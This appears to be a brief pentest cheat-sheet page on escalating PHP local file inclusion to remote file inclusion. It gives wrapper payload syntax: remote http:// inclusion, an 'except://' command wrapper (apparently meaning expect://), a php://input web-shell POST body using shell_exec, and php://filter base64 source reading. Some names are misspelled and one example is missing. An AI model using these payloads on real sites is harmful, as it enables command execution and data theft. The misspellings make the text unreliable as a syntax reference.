Turning LFI into RFI
These are techniques that you can use to turn LFI into RFI
PHP http:// Wrapper
This allows you to access URLS
http://[path-to-remote-file]Starting a simple python server we can attempt to gain the file as so:
HTTP except:// Wrapper
This wrapper allows you to run system commands. Its syntax is:
except://[command]HTTP input:// Wrapper
This allows you to read raw data from the request body, this uses post data
php://input&cmd=[command]post data syntax
<?php echo shell_exec($GET['cmd']); ?>PHP filter:// Wrapper
This wrapper converts the page into base64 and outputs it
php://filter/convert.base64-encode/resource=[file-name]Last updated
Was this helpful?